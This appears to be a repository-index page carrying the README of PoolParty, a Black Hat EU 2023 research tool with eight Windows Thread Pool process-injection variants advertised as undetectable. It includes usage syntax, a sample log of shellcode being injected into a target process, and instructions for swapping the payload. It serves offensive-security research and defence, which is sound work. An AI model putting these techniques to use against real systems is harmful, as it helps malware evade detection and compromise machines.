https://github.com/safebreach-labs/poolparty
A set of fully-undetectable process injection techniques abusing Windows Thread Pools
https://github.com/safebreach-labs/poolparty
Last synced: 15 days ago
JSON representation
A set of fully-undetectable process injection techniques abusing Windows Thread Pools
- Host: GitHub
- URL: https://github.com/safebreach-labs/poolparty
- Owner: SafeBreach-Labs
- License: bsd-3-clause
- Created: 2023-05-21T16:13:32.000Z (almost 2 years ago)
- Default Branch: main
- Last Pushed: 2023-12-11T10:52:05.000Z (over 1 year ago)
- Last Synced: 2025-04-03T09:11:09.579Z (24 days ago)
- Language: C++
- Homepage:
- Size: 84 KB
- Stars: 1,080
- Watchers: 17
- Forks: 143
- Open Issues: 1
-
Metadata Files:
- Readme: README.md
- License: LICENSE
Awesome Lists containing this project
README
# PoolParty
A collection of fully-undetectable process injection techniques abusing Windows Thread Pools. Presented at Black Hat EU 2023 Briefings under the title - [**The Pool Party You Will Never Forget: New Process Injection Techniques Using Windows Thread Pools**](https://www.blackhat.com/eu-23/briefings/schedule/#the-pool-party-you-will-never-forget-new-process-injection-techniques-using-windows-thread-pools-35446)
## PoolParty Variants
| Variant ID | Varient Description |
| ------------- | ----------------- |
| 1 | Overwrite the start routine of the target worker factory |
| 2 | Insert TP_WORK work item to the target process's thread pool |
| 3 | Insert TP_WAIT work item to the target process's thread pool |
| 4 | Insert TP_IO work item to the target process's thread pool |
| 5 | Insert TP_ALPC work item to the target process's thread pool |
| 6 | Insert TP_JOB work item to the target process's thread pool |
| 7 | Insert TP_DIRECT work item to the target process's thread pool |
| 8 | Insert TP_TIMER work item to the target process's thread pool |
## Usage
```
PoolParty.exe -V -P
```
## Usage Examples
Insert TP_TIMER work item to process ID 1234
```
>> PoolParty.exe -V 8 -P 1234
[info] Starting PoolParty attack against process id: 1234
[info] Retrieved handle to the target process: 00000000000000B8
[info] Hijacked worker factory handle from the target process: 0000000000000058
[info] Hijacked timer queue handle from the target process: 0000000000000054
[info] Allocated shellcode memory in the target process: 00000281DBEF0000
[info] Written shellcode to the target process
[info] Retrieved target worker factory basic information
[info] Created TP_TIMER structure associated with the shellcode
[info] Allocated TP_TIMER memory in the target process: 00000281DBF00000
[info] Written the specially crafted TP_TIMER structure to the target process
[info] Modified the target process's TP_POOL tiemr queue list entry to point to the specially crafted TP_TIMER
[info] Set the timer queue to expire to trigger the dequeueing TppTimerQueueExpiration
[info] PoolParty attack completed successfully
```
## Default Shellcode and Customization
The default shellcode spawns a calculator via the [WinExec API](https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-winexec).
To customize the executable to execute, change the path in the end of the `g_Shellcode` variable present in the main.cpp file.
## Author - Alon Leviev
* LinkedIn - [Alon Leviev](https://il.linkedin.com/in/alonleviev)
* Twitter - [@_0xDeku](https://twitter.com/_0xDeku)